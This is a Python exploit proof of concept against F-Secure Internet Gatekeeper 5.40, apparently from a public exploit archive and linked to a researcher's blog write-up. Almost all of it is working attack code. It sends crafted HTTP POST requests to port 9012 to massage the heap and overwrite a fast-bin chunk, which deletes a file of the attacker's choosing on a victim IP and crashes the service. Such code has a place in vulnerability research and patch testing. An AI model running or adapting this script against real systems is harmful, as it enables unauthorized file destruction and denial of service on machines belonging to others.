Share
# Title: F-Secure Internet Gatekeeper 5.40 - Heap Overflow (PoC)  
# Date: 2020-01-30  
# Author: Kevin Joensen  
# Vendor: F-Secure  
# Software: https://www.f-secure.com/en/business/downloads/internet-gatekeeper  
# CVE: N/A  
# Reference: https://blog.doyensec.com/2020/02/03/heap-exploit.html  
  
from pwn import *  
import time  
import sys  
  
  
  
def send_payload(payload, content_len=21487483844, nofun=False):  
r = remote(sys.argv[1], 9012)  
r.send("POST / HTTP/1.1\n")  
r.send("Host: 192.168.0.122:9012\n")  
r.send("Content-Length: {}\n".format(content_len))  
r.send("\n")  
r.send(payload)  
if not nofun:  
r.send("\n\n")  
return r  
  
  
def trigger_exploit():  
print "Triggering exploit"  
payload = ""  
payload += "A" * 12 # Padding  
payload += p32(0x1d) # Fast bin chunk overwrite  
payload += "A"* 488 # Padding  
payload += p32(0xdda00771) # Address of payload  
payload += p32(0xdda00771+4) # Junk  
r = send_payload(payload)  
  
  
  
def massage_heap(filename):  
print "Trying to massage the heap....."  
for x in xrange(100):  
payload = ""  
payload += p32(0x0) # Needed to bypass checks  
payload += p32(0x0) # Needed to bypass checks  
payload += p32(0xdda0077d) # Points to where the filename will be in memory  
payload += filename + "\x00"  
payload += "C"*(0x300-len(payload))  
r = send_payload(payload, content_len=0x80000, nofun=True)  
r.close()  
cut_conn = True  
print "Heap massage done"  
  
  
if __name__ == "__main__":  
if len(sys.argv) != 3:  
print "Usage: ./{} <victim_ip> <file_to_remove>".format(sys.argv[0])  
print "Run `export PWNLIB_SILENT=1` for disabling verbose connections"  
exit()  
massage_heap(sys.argv[2])  
time.sleep(1)  
trigger_exploit()  
print "Exploit finished. {} is now removed and remote process should be crashed".format(sys.argv[2])